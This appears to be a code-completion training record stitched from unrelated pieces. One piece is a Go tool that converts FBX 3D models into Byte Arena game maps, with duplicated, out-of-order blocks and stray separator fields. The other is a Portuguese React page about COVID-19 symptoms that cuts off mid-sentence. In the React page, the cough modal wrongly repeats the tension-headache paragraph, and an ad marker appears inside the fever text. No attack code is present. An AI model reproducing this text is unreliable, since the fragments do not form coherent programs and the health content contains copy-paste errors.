coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil {
fmt.Println(err)
return mapcontainer.MapPolygon{}
}
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
}
| debugPolygonSVG | identifier_name |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
|
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func debugPolygonSVG(polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
}
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil {
fmt.Println(err)
return mapcontainer.MapPolygon{}
}
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
} | if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices) | random_line_split |
symptoms.js | import React from "react";
import { Container, Col, Row, Image, Modal, Button } from "react-bootstrap";
import ImgSymptoms from "../assets/sick.png";
import ImgSymptomsCircle from "../assets/Circle.svg";
import "../components/symptoms.scss";
import Nurse from "../assets/nurse.svg";
const Symptoms = () => (
<Container>
<Col className="py-5">
<Col className="text-right m-5">
<h2 className="m-5">Sintomas do COVID-19</h2>
</Col>
<Row className="d-flex align-items-center">
<Col className="text-left" lg={3}>
<section classsName="icons__symptons ">
<AppCe />
</section>
<section classsName="icons__symptons ">
<AppTo />
</section>
<section classsName="icons__symptons ">
<AppFe />
</section>
</Col>
<Col
className="img__symptoms d-flex align-items-center justify-content-center "
lg={6}
>
<Image src={ImgSymptomsCircle} className="img__circle" />
<Image src={ImgSymptoms} />
</Col>
<Col className="text-right" lg={3}>
<section classsName="icons__symptons">
<AppDi />
</section>
<section classsName="icons__symptons">
<AppMu />
</section>
<section classsName="icons__symptons">
<AppPe />
</section>
</Col>
</Row>
</Col>
</Container>
);
//primeiro item
const One = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark">O que é Cefaleia tensional?</h4>
<p className="text-dark">
A cefaleia tensional é geralmente uma dor difusa, de leve a moderada
intensidade na sua cabeça, muitas vezes descrita como a sensação de uma
faixa apertando o crânio. A cefaleia tensional é o tipo mais comum de
dor de cabeça, e suas causas não são bem compreendidas. De acordo com a
Sociedade Brasileira de Cefaleia, cerca de 38% a 74% dos brasileiros
sofrem com cefaleia tensional.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark">Causas</h6>
<p className="text-dark">
{" "}
Não há uma causa única para dor de cabeça tensional. Este tipo de dor de
cabeça não é uma característica hereditária que ocorre em famílias. Em
algumas pessoas, dores de cabeça de tensão são causados pela contração
involuntária e crônica de músculos na parte de trás do pescoço e do
couro cabeludo. Essa tensão muscular pode ser causada por:
<ul>
<li> Repouso insuficiente </li>
<li> Má postura </li>
<li> Estresse emocional ou mental, incluindo</li>
<li> depressão </li>
<li> Ansiedade </li>
<li> Cansaço </li>
<li> Fome </li>
<li> Excesso de exercícios. </li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppCe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Cefalea
</button>
<One show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//segundo item de opção
const Tow = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Tosse?</h4>
<p className="text-dark">
Há dois tipos de tosse: a seca e a produtiva. É a presença ou não de
muco que estabelece a diferença. Na tosse produtiva a secreção se
movimenta e é eliminada; na seca, esse catarro parece não existir. É
importante avaliar se a tosse é realmente seca, ou se a secreção não
flui por desidratação ou tratamento incorreto.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas da Tosse</h6>
<p className="text-dark">
O fumo é a principal causa, porque aumenta o volume de muco produzido
pelos brônquios; causa irritação física e química das mucosas; destrói
os cílios que cobrem o revestimento interno dos brônquios; facilita o
acúmulo de material estranho às vias aéreas. Outras causas importantes
são a sinusite, principalmente em crianças, a síndrome do gotejamento
pós-nasal, a asma, o refluxo gastroesofágico, infecções respiratórias,
bronquite crônica e medicamentos para controle da hipertensão.
<h6 className="my-4">RECOMENDAÇÕES EM CASO DE TOSSE</h6>
<ul>
<li>
{" "}
Beba bastante água. A água é o melhor antitussígeno que se conhece,
pois facilita a movimentação do muco sobre a camada de cílios;{" "}
</li>
<li>
{" "}
Dê preferência aos líquidos quentes, que costumam trazer alívio
sintomático, como os chás de nossas avós: chá com limão e mel, de
camomila, erva cidreira, erva doce, entre outros. Chá-preto e
chá-mate devem ser evitados por causa do alto teor de cafeína;{" "}
</li>
<li>
{" "}
Mantenha a cabeça elevada à noite, usando travesseiros extras ou
levantando a cabeceira da cama com calços;
</li>
<li> Mantenha os ambientes bem ventilados;</li>
<li>
{" "}
Aumente o teor de umidade do ar com umidificadores ou vaporizadores.
Tome banhos quentes prolongados para respirar bastante vapor;
</li>
<li>
{" "}
Não tome remédios por conta própria. Procure assistência médica para
diagnóstico e tratamento.
</li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppTo() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Tosse
</button>
<Tow show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//terceiro
const Three = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Febre?</h4>
<p className="text-dark">
A febre é um dos sinais clínicos mais comuns no ser humano e se
caracteriza por uma elevação acima da média da temperatura corporal. A
febre é tão comum que a maioria de nós nunca parou para pensar no seu
real significado. PUBLICIDADE Geralmente associada à infecção, a febre
também pode ocorrer em diversas outras situações, como em caso de
